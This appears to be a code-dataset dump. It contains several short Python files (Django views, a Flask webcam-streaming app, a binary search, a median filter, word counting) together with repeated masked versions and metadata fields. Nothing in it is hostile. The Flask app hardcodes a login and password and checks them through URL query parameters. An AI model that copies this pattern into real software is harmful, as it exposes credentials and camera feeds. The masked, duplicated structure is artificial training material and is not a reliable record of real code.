raw},\n RequestContext(request))\n\n\n<mask token>\n", "step-3": "<mask token>\n\n\ndef welcome(request):\n return render_to_response('pages/welcome.html', {}, RequestContext(request)\n )\n\n\ndef dashboard(request):\n context = {'context_list': ContextDefinition.objects.filter(Q(owner=\n request.user) & Q(inherited=False) & Q(abstract=False)).order_by(\n '-public', 'name'), 'full_abstract_list': get_list_allowed_abstract\n (request), 'my_abstract_list': ContextDefinition.objects.filter(Q(\n owner=request.user) & Q(inherited=False) & Q(abstract=True)).\n order_by('name'), 'cluster_list': ClusterDefinition.objects.filter(\n owner=request.user).order_by('-public', 'name'), 'machine_list':\n Machines.objects.filter(owner=request.user)}\n context['webapi_configurations'] = settings.WEBAPI_CONFIGURATIONS\n push_to_context('redirect_msg_info', 'msg_info', context, request)\n push_to_context('redirect_msg_error', 'msg_error', context, request)\n push_to_context('redirect_msg_warning', 'msg_warning', context, request)\n push_to_context('redirect_msg_confirm', 'msg_confirm', context, request)\n return uncache_response(render_to_response('pages/dashboard.html',\n context, RequestContext(request)))\n\n\ndef test(request):\n raw = (\n '<h1>404 - Not found</h1><p>This is not the website you are looking for</p>'\n )\n return render_to_response('core/raw.html', {'body': raw},\n RequestContext(request))\n\n\ndef push_to_context(sessionName, contextName, context, request):\n if sessionName in request.session:\n context[contextName] = request.session[sessionName]\n del request.session[sessionName]\n", "step-4": "from django.http import HttpResponse\nfrom django.shortcuts import render_to_response\nfrom django.template import RequestContext\nfrom django.db.models import Q\nfrom cvmo import settings\nfrom cvmo.context.models import ContextDefinition, Machines, ClusterDefinition, MarketplaceContextEntry\nfrom cvmo.context.plugins import ContextPlugins\nfrom cvmo.context.utils.views import uncache_response\nfrom cvmo.context.utils.views import get_list_allowed_abstract\n\n\ndef welcome(request):\n return render_to_response('pages/welcome.html', {}, RequestContext(request)\n )\n\n\ndef dashboard(request):\n context = {'context_list': ContextDefinition.objects.filter(Q(owner=\n request.user) & Q(inherited=False) & Q(abstract=False)).order_by(\n '-public', 'name'), 'full_abstract_list': get_list_allowed_abstract\n (request), 'my_abstract_list': ContextDefinition.objects.filter(Q(\n owner=request.user) & Q(inherited=False) & Q(abstract=True)).\n order_by('name'), 'cluster_list': ClusterDefinition.objects.filter(\n owner=request.user).order_by('-public', 'name'), 'machine_list':\n Machines.objects.filter(owner=request.user)}\n context['webapi_configurations'] = settings.WEBAPI_CONFIGURATIONS\n push_to_context('redirect_msg_info', 'msg_info', context, request)\n push_to_context('redirect_msg_error', 'msg_error', context, request)\n push_to_context('redirect_msg_warning', 'msg_warning', context, request)\n push_to_context('redirect_msg_confirm', 'msg_confirm', context, request)\n return uncache_response(render_to_response('pages/dashboard.html',\n context, RequestContext(request)))\n\n\ndef test(request):\n raw = (\n '<h1>404 - Not found</h1><p>This is not the website you are looking for</p>'\n )\n return render_to_response('core/raw.html', {'body': raw},\n RequestContext(request))\n\n\ndef push_to_context(sessionName, contextName, context, request):\n if sessionName in request.session:\n context[contextName] = request.session[sessionName]\n del request.session[sessionName]\n", "step-5": "from django.http import HttpResponse\nfrom django.shortcuts import render_to_response\nfrom django.template import RequestContext\nfrom django.db.models import Q\n\nfrom cvmo import settings\n\nfrom cvmo.context.models import ContextDefinition, Machines, ClusterDefinition, MarketplaceContextEntry\n\nfrom cvmo.context.plugins import ContextPlugins\nfrom cvmo.context.utils.views import uncache_response\n\nfrom cvmo.context.utils.views import get_list_allowed_abstract\n\ndef welcome(request):\n return render_to_response('pages/welcome.html', {}, RequestContext(request))\n\ndef dashboard(request):\n context = {\n 'context_list': ContextDefinition.objects.filter(Q(owner=request.user) & Q(inherited=False) & Q(abstract=False)).order_by('-public', 'name'),\n 'full_abstract_list': get_list_allowed_abstract(request),\n 'my_abstract_list': ContextDefinition.objects.filter(Q(owner=request.user) & Q(inherited=False) & Q(abstract=True)).order_by('name'),\n 'cluster_list': ClusterDefinition.objects.filter(owner=request.user).order_by('-public', 'name'),\n 'machine_list': Machines.objects.filter(owner=request.user)\n }\n context[\"webapi_configurations\"] = settings.WEBAPI_CONFIGURATIONS\n push_to_context(\"redirect_msg_info\", \"msg_info\", context, request)\n push_to_context(\"redirect_msg_error\", \"msg_error\", context, request)\n push_to_context(\"redirect_msg_warning\", \"msg_warning\", context, request)\n push_to_context(\"redirect_msg_confirm\", \"msg_confirm\", context, request)\n\n return uncache_response(render_to_response('pages/dashboard.html', context, RequestContext(request)))\n\ndef test(request):\n raw = \"<h1>404 - Not found</h1><p>This is not the website you are looking for</p>\"\n return render_to_response('core/raw.html', {'body': raw}, RequestContext(request))\n\ndef push_to_context(sessionName, contextName, context, request):\n if sessionName in request.session:\n context[contextName] = request.session[sessionName]\n del request.session[sessionName]\n", "step-ids": [ 1, 3, 4, 5, 6 ] }
[ 1, 3, 4, 5, 6 ]
import os from pathlib import Path DEFAULT_ROOT_PATH = Path(os.path.expanduser(os.getenv("PLOTTER_ROOT", "~/.plotter/mainnet"))).resolve()
normal
{ "blob_id": "3a8164299fa51b7d781f2b80d77cfba05b5f6915", "index": 4157, "step-1": "<mask token>\n", "step-2": "<mask token>\nDEFAULT_ROOT_PATH = Path(os.path.expanduser(os.getenv('PLOTTER_ROOT',\n '~/.plotter/mainnet'))).resolve()\n", "step-3": "import os\nfrom pathlib import Path\nDEFAULT_ROOT_PATH = Path(os.path.expanduser(os.getenv('PLOTTER_ROOT',\n '~/.plotter/mainnet'))).resolve()\n", "step-4": "import os\nfrom pathlib import Path\n\nDEFAULT_ROOT_PATH = Path(os.path.expanduser(os.getenv(\"PLOTTER_ROOT\", \"~/.plotter/mainnet\"))).resolve()\n", "step-5": null, "step-ids": [ 0, 1, 2, 3 ] }
[ 0, 1, 2, 3 ]
<|reserved_special_token_0|> <|reserved_special_token_1|> <|reserved_special_token_0|> for i in a: if i.isalpha(): b.append(i) else: ind.append(a.index(i)) <|reserved_special_token_0|> for i in ind: c.insert(i, a[i]) print(''.join(c)) <|reserved_special_token_1|> a = input() b = [] ind = [] for i in a: if i.isalpha(): b.append(i) else: ind.append(a.index(i)) c = list(reversed(b)) for i in ind: c.insert(i, a[i]) print(''.join(c))
flexible
{ "blob_id": "8fedaeb13fde117cf6b7ace23b59c26e4aab2bc2", "index": 4492, "step-1": "<mask token>\n", "step-2": "<mask token>\nfor i in a:\n if i.isalpha():\n b.append(i)\n else:\n ind.append(a.index(i))\n<mask token>\nfor i in ind:\n c.insert(i, a[i])\nprint(''.join(c))\n", "step-3": "a = input()\nb = []\nind = []\nfor i in a:\n if i.isalpha():\n b.append(i)\n else:\n ind.append(a.index(i))\nc = list(reversed(b))\nfor i in ind:\n c.insert(i, a[i])\nprint(''.join(c))\n", "step-4": null, "step-5": null, "step-ids": [ 0, 1, 2 ] }
[ 0, 1, 2 ]
from api import * version_api = api(0) def is_bad_version(v): return version_api.is_bad(v) def first_bad_version(n): # -- DO NOT CHANGE THIS SECTION version_api.n = n # -- api_calls_count = 0 left, right = 1, n while left < right: mid = (left + right) // 2 is_bad = is_bad_version(mid) api_calls_count += 1 if is_bad: right = mid else: left = mid + 1 return left, api_calls_count
normal
{ "blob_id": "df4c03d9faedf2d347593825c7221937a75a9c10", "index": 5360, "step-1": "<mask token>\n\n\ndef is_bad_version(v):\n return version_api.is_bad(v)\n\n\n<mask token>\n", "step-2": "<mask token>\n\n\ndef is_bad_version(v):\n return version_api.is_bad(v)\n\n\ndef first_bad_version(n):\n version_api.n = n\n api_calls_count = 0\n left, right = 1, n\n while left < right:\n mid = (left + right) // 2\n is_bad = is_bad_version(mid)\n api_calls_count += 1\n if is_bad:\n right = mid\n else:\n left = mid + 1\n return left, api_calls_count\n", "step-3": "<mask token>\nversion_api = api(0)\n\n\ndef is_bad_version(v):\n return version_api.is_bad(v)\n\n\ndef first_bad_version(n):\n version_api.n = n\n api_calls_count = 0\n left, right = 1, n\n while left < right:\n mid = (left + right) // 2\n is_bad = is_bad_version(mid)\n api_calls_count += 1\n if is_bad:\n right = mid\n else:\n left = mid + 1\n return left, api_calls_count\n", "step-4": "from api import *\nversion_api = api(0)\n\n\ndef is_bad_version(v):\n return version_api.is_bad(v)\n\n\ndef first_bad_version(n):\n version_api.n = n\n api_calls_count = 0\n left, right = 1, n\n while left < right:\n mid = (left + right) // 2\n is_bad = is_bad_version(mid)\n api_calls_count += 1\n if is_bad:\n right = mid\n else:\n left = mid + 1\n return left, api_calls_count\n", "step-5": "from api import *\n\nversion_api = api(0)\n\ndef is_bad_version(v):\n return version_api.is_bad(v)\n\ndef first_bad_version(n):\n# -- DO NOT CHANGE THIS SECTION\n version_api.n = n\n# --\n api_calls_count = 0\n\n left, right = 1, n\n while left < right:\n mid = (left + right) // 2\n\n is_bad = is_bad_version(mid)\n api_calls_count += 1\n\n if is_bad:\n right = mid\n else:\n left = mid + 1\n\n\n return left, api_calls_count\n", "step-ids": [ 1, 2, 3, 4, 5 ] }
[ 1, 2, 3, 4, 5 ]
#!/usr/bin/python # coding=utf-8 import re str1 = 'http://www.chinapesticide.org.cn/myquery/querydetail?pdno=' str2 = '&pdrgno=' f = open('aaa.txt', 'r') source = f.read() rr = re.compile(r'open[(\'](.*)[\']') s=rr.findall(source) for line in s: temps = line.split(',') a = temps[0] b = temps[1] print str1 + a.replace('\'', '').strip() + str2 + b.replace('\'','').strip() f.close()
normal
{ "blob_id": "387c48fcf00480a820fb407f5bad1d9f41b28e7a", "index": 9160, "step-1": "#!/usr/bin/python\n# coding=utf-8\n\nimport re\n\nstr1 = 'http://www.chinapesticide.org.cn/myquery/querydetail?pdno='\nstr2 = '&pdrgno='\nf = open('aaa.txt', 'r')\nsource = f.read()\nrr = re.compile(r'open[(\\'](.*)[\\']')\ns=rr.findall(source)\nfor line in s:\n temps = line.split(',')\n a = temps[0]\n b = temps[1]\n print str1 + a.replace('\\'', '').strip() + str2 + b.replace('\\'','').strip()\nf.close()\n\n", "step-2": null, "step-3": null, "step-4": null, "step-5": null, "step-ids": [ 0 ] }
[ 0 ]
<|reserved_special_token_0|> <|reserved_special_token_1|> <|reserved_special_token_0|> def count_words(sentence): sentence = re.findall("\\b[\\w'-]+\\b", sentence.lower().replace('_', ' ')) counts = defaultdict(lambda : 0) for word in sentence: counts[word] += 1 return counts <|reserved_special_token_1|> import re from collections import defaultdict def count_words(sentence): sentence = re.findall("\\b[\\w'-]+\\b", sentence.lower().replace('_', ' ')) counts = defaultdict(lambda : 0) for word in sentence: counts[word] += 1 return counts <|reserved_special_token_1|> import re from collections import defaultdict def count_words(sentence): # extract all the words as per definition sentence = re.findall(r"\b[\w'-]+\b", sentence.lower().replace('_', ' ')) counts = defaultdict(lambda: 0) # Counting the frequency of each words for word in sentence: counts[word] += 1 return counts
flexible
{ "blob_id": "7f5f16ea10980e0ade7357cdae38f47f8d7cdf01", "index": 2446, "step-1": "<mask token>\n", "step-2": "<mask token>\n\n\ndef count_words(sentence):\n sentence = re.findall(\"\\\\b[\\\\w'-]+\\\\b\", sentence.lower().replace('_', ' '))\n counts = defaultdict(lambda : 0)\n for word in sentence:\n counts[word] += 1\n return counts\n", "step-3": "import re\nfrom collections import defaultdict\n\n\ndef count_words(sentence):\n sentence = re.findall(\"\\\\b[\\\\w'-]+\\\\b\", sentence.lower().replace('_', ' '))\n counts = defaultdict(lambda : 0)\n for word in sentence:\n counts[word] += 1\n return counts\n", "step-4": "import re\nfrom collections import defaultdict\n\ndef count_words(sentence):\n # extract all the words as per definition\n sentence = re.findall(r\"\\b[\\w'-]+\\b\", sentence.lower().replace('_', ' '))\n counts = defaultdict(lambda: 0)\n\n # Counting the frequency of each words\n for word in sentence:\n counts[word] += 1\n \n return counts\n ", "step-5": null, "step-ids": [ 0, 1, 2, 3 ] }
[ 0, 1, 2, 3 ]
import math import numpy as np from statistics import median from src.filter.median import quickselect_median def bilateral_median_filter(flow, log_occlusen, auxiliary_field, image, weigth_auxiliary, weigth_filter, sigma_distance = 7, sigma_color =7 / 200, filter_size=5): """ :param flow: np.float (YX,Height,Width) :param occlusen: (Height, Width) :param auxiliary_field: np.array(float) (Y_flow X_flow , Y_coord X_coord, Height, Width) :param image: np.array(float) (ColorChannel, Height, Width) :param weigth_auxiliary: float > 0 :param weigth_filter: float > 0 :param sigma_distance: float :param sigma_color: float :param filter_size: int :return: flow field """ width = flow.shape[2] height = flow.shape[1] color_channel_count = flow.shape[0] filter_half = int(filter_size / 2) helper_list_size = filter_size ** 2 * 2 helper_flow_x_list = [0.0] * (helper_list_size+1) helper_flow_y_list = [0.0] * (helper_list_size+1) weigths_list = [0.0] * helper_list_size result_flow = np.empty(shape=(2, height, width), dtype=float) for y in range(height): for x in range(width): min_x_compare = max(0, x - filter_half) max_x_compare = min(width, x + filter_half + 1) min_y_compare = max(0, y - filter_half) max_y_compare = min(height, y + filter_half + 1) counter = 0 for y_compare in range(min_y_compare, max_y_compare): for x_compare in range(min_x_compare, max_x_compare): distance_squared_difference = (y - y_compare) ** 2 + (x - x_compare) ** 2 color_squared_difference = 0 for channel in image: color_squared_difference += (channel[y_compare][x_compare] - channel[y][x]) ** 2 exponent = distance_squared_difference / (2 * sigma_distance * sigma_distance) exponent += color_squared_difference / (2 * sigma_color * sigma_color * color_channel_count) occlusen_current = log_occlusen[y][x] occlusen_compared = log_occlusen[y_compare][x_compare] #weigth = math.exp(-exponent) * occlusen_compared / occlusen_current weigth = math.exp(-exponent+occlusen_compared-occlusen_current) weigths_list[counter] = weigth helper_flow_x_list[counter] = flow[1][y_compare][x_compare] helper_flow_y_list[counter] = flow[0][y_compare][x_compare] counter += 1 # See A NEW MEDIAN FORMULA WITH APPLICATIONS TO PDE BASED DENOISING # 3.13 n = counter f_x = auxiliary_field[1][y][x] f_y = auxiliary_field[0][y][x] scalar = 1/(2*(weigth_auxiliary / weigth_filter)) for idx_1 in range(n+1): sum = 0 for idx_2 in range(idx_1): sum -= weigths_list[idx_2] for idx_2 in range(idx_1, n): sum += weigths_list[idx_2] helper_flow_x_list[n + idx_1] = f_x + scalar * sum helper_flow_y_list[n + idx_1] = f_y + scalar * sum result_flow[0][y][x] = median(helper_flow_y_list[:n*2+1]) result_flow[1][y][x] = median(helper_flow_x_list[:n*2+1]) print("result_flow") print(result_flow.flatten()) return result_flow
normal
{ "blob_id": "1748c8dfcc3974b577d7bfacb5cabe4404b696bc", "index": 612, "step-1": "<mask token>\n", "step-2": "<mask token>\n\n\ndef bilateral_median_filter(flow, log_occlusen, auxiliary_field, image,\n weigth_auxiliary, weigth_filter, sigma_distance=7, sigma_color=7 / 200,\n filter_size=5):\n \"\"\"\n\n :param flow: np.float (YX,Height,Width)\n :param occlusen: (Height, Width)\n :param auxiliary_field: np.array(float) (Y_flow X_flow , Y_coord X_coord, Height, Width)\n :param image: np.array(float) (ColorChannel, Height, Width)\n :param weigth_auxiliary: float > 0\n :param weigth_filter: float > 0\n :param sigma_distance: float\n :param sigma_color: float\n :param filter_size: int\n :return: flow field\n \"\"\"\n width = flow.shape[2]\n height = flow.shape[1]\n color_channel_count = flow.shape[0]\n filter_half = int(filter_size / 2)\n helper_list_size = filter_size ** 2 * 2\n helper_flow_x_list = [0.0] * (helper_list_size + 1)\n helper_flow_y_list = [0.0] * (helper_list_size + 1)\n weigths_list = [0.0] * helper_list_size\n result_flow = np.empty(shape=(2, height, width), dtype=float)\n for y in range(height):\n for x in range(width):\n min_x_compare = max(0, x - filter_half)\n max_x_compare = min(width, x + filter_half + 1)\n min_y_compare = max(0, y - filter_half)\n max_y_compare = min(height, y + filter_half + 1)\n counter = 0\n for y_compare in range(min_y_compare, max_y_compare):\n for x_compare in range(min_x_compare, max_x_compare):\n distance_squared_difference = (y - y_compare) ** 2 + (x -\n x_compare) ** 2\n color_squared_difference = 0\n for channel in image:\n color_squared_difference += (channel[y_compare][\n x_compare] - channel[y][x]) ** 2\n exponent = distance_squared_difference / (2 *\n sigma_distance * sigma_distance)\n exponent += color_squared_difference / (2 * sigma_color *\n sigma_color * color_channel_count)\n occlusen_current = log_occlusen[y][x]\n occlusen_compared = log_occlusen[y_compare][x_compare]\n weigth = math.exp(-exponent + occlusen_compared -\n occlusen_current)\n weigths_list[counter] = weigth\n helper_flow_x_list[counter] = flow[1][y_compare][x_compare]\n helper_flow_y_list[counter] = flow[0][y_compare][x_compare]\n counter += 1\n n = counter\n f_x = auxiliary_field[1][y][x]\n f_y = auxiliary_field[0][y][x]\n scalar = 1 / (2 * (weigth_auxiliary / weigth_filter))\n for idx_1 in range(n + 1):\n sum = 0\n for idx_2 in range(idx_1):\n sum -= weigths_list[idx_2]\n for idx_2 in range(idx_1, n):\n sum += weigths_list[idx_2]\n helper_flow_x_list[n + idx_1] = f_x + scalar * sum\n helper_flow_y_list[n + idx_1] = f_y + scalar * sum\n result_flow[0][y][x] = median(helper_flow_y_list[:n * 2 + 1])\n result_flow[1][y][x] = median(helper_flow_x_list[:n * 2 + 1])\n print('result_flow')\n print(result_flow.flatten())\n return result_flow\n", "step-3": "import math\nimport numpy as np\nfrom statistics import median\nfrom src.filter.median import quickselect_median\n\n\ndef bilateral_median_filter(flow, log_occlusen, auxiliary_field, image,\n weigth_auxiliary, weigth_filter, sigma_distance=7, sigma_color=7 / 200,\n filter_size=5):\n \"\"\"\n\n :param flow: np.float (YX,Height,Width)\n :param occlusen: (Height, Width)\n :param auxiliary_field: np.array(float) (Y_flow X_flow , Y_coord X_coord, Height, Width)\n :param image: np.array(float) (ColorChannel, Height, Width)\n :param weigth_auxiliary: float > 0\n :param weigth_filter: float > 0\n :param sigma_distance: float\n :param sigma_color: float\n :param filter_size: int\n :return: flow field\n \"\"\"\n width = flow.shape[2]\n height = flow.shape[1]\n color_channel_count = flow.shape[0]\n filter_half = int(filter_size / 2)\n helper_list_size = filter_size ** 2 * 2\n helper_flow_x_list = [0.0] * (helper_list_size + 1)\n helper_flow_y_list = [0.0] * (helper_list_size + 1)\n weigths_list = [0.0] * helper_list_size\n result_flow = np.empty(shape=(2, height, width), dtype=float)\n for y in range(height):\n for x in range(width):\n min_x_compare = max(0, x - filter_half)\n max_x_compare = min(width, x + filter_half + 1)\n min_y_compare = max(0, y - filter_half)\n max_y_compare = min(height, y + filter_half + 1)\n counter = 0\n for y_compare in range(min_y_compare, max_y_compare):\n for x_compare in range(min_x_compare, max_x_compare):\n distance_squared_difference = (y - y_compare) ** 2 + (x -\n x_compare) ** 2\n color_squared_difference = 0\n for channel in image:\n color_squared_difference += (channel[y_compare][\n x_compare] - channel[y][x]) ** 2\n exponent = distance_squared_difference / (2 *\n sigma_distance * sigma_distance)\n exponent += color_squared_difference / (2 * sigma_color *\n sigma_color * color_channel_count)\n occlusen_current = log_occlusen[y][x]\n occlusen_compared = log_occlusen[y_compare][x_compare]\n weigth = math.exp(-exponent + occlusen_compared -\n occlusen_current)\n weigths_list[counter] = weigth\n helper_flow_x_list[counter] = flow[1][y_compare][x_compare]\n helper_flow_y_list[counter] = flow[0][y_compare][x_compare]\n counter += 1\n n = counter\n f_x = auxiliary_field[1][y][x]\n f_y = auxiliary_field[0][y][x]\n scalar = 1 / (2 * (weigth_auxiliary / weigth_filter))\n for idx_1 in range(n + 1):\n sum = 0\n for idx_2 in range(idx_1):\n sum -= weigths_list[idx_2]\n for idx_2 in range(idx_1, n):\n sum += weigths_list[idx_2]\n helper_flow_x_list[n + idx_1] = f_x + scalar * sum\n helper_flow_y_list[n + idx_1] = f_y + scalar * sum\n result_flow[0][y][x] = median(helper_flow_y_list[:n * 2 + 1])\n result_flow[1][y][x] = median(helper_flow_x_list[:n * 2 + 1])\n print('result_flow')\n print(result_flow.flatten())\n return result_flow\n", "step-4": "import math\nimport numpy as np\nfrom statistics import median\nfrom src.filter.median import quickselect_median\n\n\ndef bilateral_median_filter(flow, log_occlusen, auxiliary_field, image, weigth_auxiliary, weigth_filter,\n sigma_distance = 7, sigma_color =7 / 200, filter_size=5):\n \"\"\"\n\n :param flow: np.float (YX,Height,Width)\n :param occlusen: (Height, Width)\n :param auxiliary_field: np.array(float) (Y_flow X_flow , Y_coord X_coord, Height, Width)\n :param image: np.array(float) (ColorChannel, Height, Width)\n :param weigth_auxiliary: float > 0\n :param weigth_filter: float > 0\n :param sigma_distance: float\n :param sigma_color: float\n :param filter_size: int\n :return: flow field\n \"\"\"\n width = flow.shape[2]\n height = flow.shape[1]\n color_channel_count = flow.shape[0]\n\n filter_half = int(filter_size / 2)\n\n helper_list_size = filter_size ** 2 * 2\n helper_flow_x_list = [0.0] * (helper_list_size+1)\n helper_flow_y_list = [0.0] * (helper_list_size+1)\n weigths_list = [0.0] * helper_list_size\n\n result_flow = np.empty(shape=(2, height, width), dtype=float)\n\n for y in range(height):\n for x in range(width):\n min_x_compare = max(0, x - filter_half)\n max_x_compare = min(width, x + filter_half + 1)\n\n min_y_compare = max(0, y - filter_half)\n max_y_compare = min(height, y + filter_half + 1)\n\n counter = 0\n\n for y_compare in range(min_y_compare, max_y_compare):\n for x_compare in range(min_x_compare, max_x_compare):\n distance_squared_difference = (y - y_compare) ** 2 + (x - x_compare) ** 2\n color_squared_difference = 0\n for channel in image:\n color_squared_difference += (channel[y_compare][x_compare] - channel[y][x]) ** 2\n\n exponent = distance_squared_difference / (2 * sigma_distance * sigma_distance)\n exponent += color_squared_difference / (2 * sigma_color * sigma_color * color_channel_count)\n\n occlusen_current = log_occlusen[y][x]\n occlusen_compared = log_occlusen[y_compare][x_compare]\n\n #weigth = math.exp(-exponent) * occlusen_compared / occlusen_current\n weigth = math.exp(-exponent+occlusen_compared-occlusen_current)\n weigths_list[counter] = weigth\n\n helper_flow_x_list[counter] = flow[1][y_compare][x_compare]\n helper_flow_y_list[counter] = flow[0][y_compare][x_compare]\n\n counter += 1\n\n # See A NEW MEDIAN FORMULA WITH APPLICATIONS TO PDE BASED DENOISING\n # 3.13\n\n n = counter\n\n f_x = auxiliary_field[1][y][x]\n f_y = auxiliary_field[0][y][x]\n scalar = 1/(2*(weigth_auxiliary / weigth_filter))\n\n for idx_1 in range(n+1):\n sum = 0\n for idx_2 in range(idx_1):\n sum -= weigths_list[idx_2]\n\n for idx_2 in range(idx_1, n):\n sum += weigths_list[idx_2]\n helper_flow_x_list[n + idx_1] = f_x + scalar * sum\n helper_flow_y_list[n + idx_1] = f_y + scalar * sum\n\n result_flow[0][y][x] = median(helper_flow_y_list[:n*2+1])\n result_flow[1][y][x] = median(helper_flow_x_list[:n*2+1])\n print(\"result_flow\")\n print(result_flow.flatten())\n return result_flow\n", "step-5": null, "step-ids": [ 0, 1, 2, 3 ] }
[ 0, 1, 2, 3 ]
<|reserved_special_token_0|> <|reserved_special_token_1|> <|reserved_special_token_0|> class Migration(migrations.Migration): <|reserved_special_token_0|> <|reserved_special_token_0|> <|reserved_special_token_1|> <|reserved_special_token_0|> class Migration(migrations.Migration): dependencies = [('userProfile', '0022_auto_20210823_1858')] operations = [migrations.RemoveField(model_name='subscription', name= 'price_type'), migrations.AddField(model_name='subscription', name= 'price', field=models.ForeignKey(null=True, on_delete=django.db. models.deletion.SET_NULL, to='userProfile.price'))] <|reserved_special_token_1|> from django.db import migrations, models import django.db.models.deletion class Migration(migrations.Migration): dependencies = [('userProfile', '0022_auto_20210823_1858')] operations = [migrations.RemoveField(model_name='subscription', name= 'price_type'), migrations.AddField(model_name='subscription', name= 'price', field=models.ForeignKey(null=True, on_delete=django.db. models.deletion.SET_NULL, to='userProfile.price'))] <|reserved_special_token_1|> # Generated by Django 3.2.5 on 2021-08-28 12:34 from django.db import migrations, models import django.db.models.deletion class Migration(migrations.Migration): dependencies = [ ('userProfile', '0022_auto_20210823_1858'), ] operations = [ migrations.RemoveField( model_name='subscription', name='price_type', ), migrations.AddField( model_name='subscription', name='price', field=models.ForeignKey(null=True, on_delete=django.db.models.deletion.SET_NULL, to='userProfile.price'), ), ]
flexible
{ "blob_id": "96bb865b66e5d9ba62bab210705338f1799cc490", "index": 7022, "step-1": "<mask token>\n", "step-2": "<mask token>\n\n\nclass Migration(migrations.Migration):\n <mask token>\n <mask token>\n", "step-3": "<mask token>\n\n\nclass Migration(migrations.Migration):\n dependencies = [('userProfile', '0022_auto_20210823_1858')]\n operations = [migrations.RemoveField(model_name='subscription', name=\n 'price_type'), migrations.AddField(model_name='subscription', name=\n 'price', field=models.ForeignKey(null=True, on_delete=django.db.\n models.deletion.SET_NULL, to='userProfile.price'))]\n", "step-4": "from django.db import migrations, models\nimport django.db.models.deletion\n\n\nclass Migration(migrations.Migration):\n dependencies = [('userProfile', '0022_auto_20210823_1858')]\n operations = [migrations.RemoveField(model_name='subscription', name=\n 'price_type'), migrations.AddField(model_name='subscription', name=\n 'price', field=models.ForeignKey(null=True, on_delete=django.db.\n models.deletion.SET_NULL, to='userProfile.price'))]\n", "step-5": "# Generated by Django 3.2.5 on 2021-08-28 12:34\n\nfrom django.db import migrations, models\nimport django.db.models.deletion\n\n\nclass Migration(migrations.Migration):\n\n dependencies = [\n ('userProfile', '0022_auto_20210823_1858'),\n ]\n\n operations = [\n migrations.RemoveField(\n model_name='subscription',\n name='price_type',\n ),\n migrations.AddField(\n model_name='subscription',\n name='price',\n field=models.ForeignKey(null=True, on_delete=django.db.models.deletion.SET_NULL, to='userProfile.price'),\n ),\n ]\n", "step-ids": [ 0, 1, 2, 3, 4 ] }
[ 0, 1, 2, 3, 4 ]
import shutil total, used, free = shutil.disk_usage("/") print("Total: %d MiB" % (total // (2**20))) print("Used: %d MiB" % (used // (2**20))) print("Free: %d MiB" % (free // (2**20))) from Camera import Camera import time import cv2 devices = Camera.getDevicesList() print(devices) i=0 Cameras = [] for device in devices: Cameras.append(Camera(i)) i=i+1 time.sleep(1) print("Ilość kamer: " + str(len(Cameras))) import threading ### REST from flask import render_template, Response from flask import Flask, jsonify from flask import abort from flask import request Login = "kamil" Password = "123" tasks = [ { 'id': 1, 'title': u'Buy groceries', 'description': u'Milk, Cheese, Pizza, Fruit, Tylenol', 'done': False }, { 'id': 2, 'title': u'Learn Python', 'description': u'Need to find a good Python tutorial on the web', 'done': False } ] restAppi = Flask(__name__) def gen(task_id): while True: print("Thread runned " + str(task_id)) #get camera frame img = Cameras[task_id].getImg() ret, jpeg = cv2.imencode('.jpg', img) frame = jpeg.tobytes() yield (b'--frame\r\n' b'Content-Type: image/jpeg\r\n\r\n' + frame + b'\r\n\r\n') @restAppi.route('/video_feed/<int:task_id>') def video_feed(task_id): #print(task_id) return Response(gen(task_id), mimetype='multipart/x-mixed-replace; boundary=frame') @restAppi.route('/camerasPreview', methods=['GET']) def camerasPreview(): login = category = request.args.get('login') password = content_id = request.args.get('password') print(login) print(password) if (login == Login) and password == Password: return render_template("CamerasPreview.html", name = "Kamil", camerasCount = len(Cameras)) else: abort(401); @restAppi.route('/') def index(): return render_template("index.html") @restAppi.route('/todo/api/v1.0/tasks', methods=['GET']) def get_tasks(): return jsonify({'tasks': tasks}) @restAppi.route('/todo/api/v1.0/tasks/<int:task_id>', methods=['GET']) def get_task(task_id): task = [task for task in tasks if task['id'] == task_id] if len(task) == 0: abort(404) return jsonify({'task': task[0]}) restAppiRunned = False if __name__ == "__main__": threading.Thread(target=restAppi.run(debug=False)).start() #if __name__ == '__main__': # restAppi.run(debug=False)
normal
{ "blob_id": "5cdedce5f984f53b8e26d1580a9040b26023f247", "index": 2910, "step-1": "<mask token>\n\n\ndef gen(task_id):\n while True:\n print('Thread runned ' + str(task_id))\n img = Cameras[task_id].getImg()\n ret, jpeg = cv2.imencode('.jpg', img)\n frame = jpeg.tobytes()\n yield b'--frame\\r\\nContent-Type: image/jpeg\\r\\n\\r\\n' + frame + b'\\r\\n\\r\\n'\n\n\n@restAppi.route('/video_feed/<int:task_id>')\ndef video_feed(task_id):\n return Response(gen(task_id), mimetype=\n 'multipart/x-mixed-replace; boundary=frame')\n\n\n@restAppi.route('/camerasPreview', methods=['GET'])\ndef camerasPreview():\n login = category = request.args.get('login')\n password = content_id = request.args.get('password')\n print(login)\n print(password)\n if login == Login and password == Password:\n return render_template('CamerasPreview.html', name='Kamil',\n camerasCount=len(Cameras))\n else:\n abort(401)\n\n\n@restAppi.route('/')\ndef index():\n return render_template('index.html')\n\n\n@restAppi.route('/todo/api/v1.0/tasks', methods=['GET'])\ndef get_tasks():\n return jsonify({'tasks': tasks})\n\n\n@restAppi.route('/todo/api/v1.0/tasks/<int:task_id>', methods=['GET'])\ndef get_task(task_id):\n task = [task for task in tasks if task['id'] == task_id]\n if len(task) == 0:\n abort(404)\n return jsonify({'task': task[0]})\n\n\n<mask token>\n", "step-2": "<mask token>\nprint('Total: %d MiB' % (total // 2 ** 20))\nprint('Used: %d MiB' % (used // 2 ** 20))\nprint('Free: %d MiB' % (free // 2 ** 20))\n<mask token>\nprint(devices)\n<mask token>\nfor device in devices:\n Cameras.append(Camera(i))\n i = i + 1\ntime.sleep(1)\nprint('Ilość kamer: ' + str(len(Cameras)))\n<mask token>\n\n\ndef gen(task_id):\n while True:\n print('Thread runned ' + str(task_id))\n img = Cameras[task_id].getImg()\n ret, jpeg = cv2.imencode('.jpg', img)\n frame = jpeg.tobytes()\n yield b'--frame\\r\\nContent-Type: image/jpeg\\r\\n\\r\\n' + frame + b'\\r\\n\\r\\n'\n\n\n@restAppi.route('/video_feed/<int:task_id>')\ndef video_feed(task_id):\n return Response(gen(task_id), mimetype=\n 'multipart/x-mixed-replace; boundary=frame')\n\n\n@restAppi.route('/camerasPreview', methods=['GET'])\ndef camerasPreview():\n login = category = request.args.get('login')\n password = content_id = request.args.get('password')\n print(login)\n print(password)\n if login == Login and password == Password:\n return render_template('CamerasPreview.html', name='Kamil',\n camerasCount=len(Cameras))\n else:\n abort(401)\n\n\n@restAppi.route('/')\ndef index():\n return render_template('index.html')\n\n\n@restAppi.route('/todo/api/v1.0/tasks', 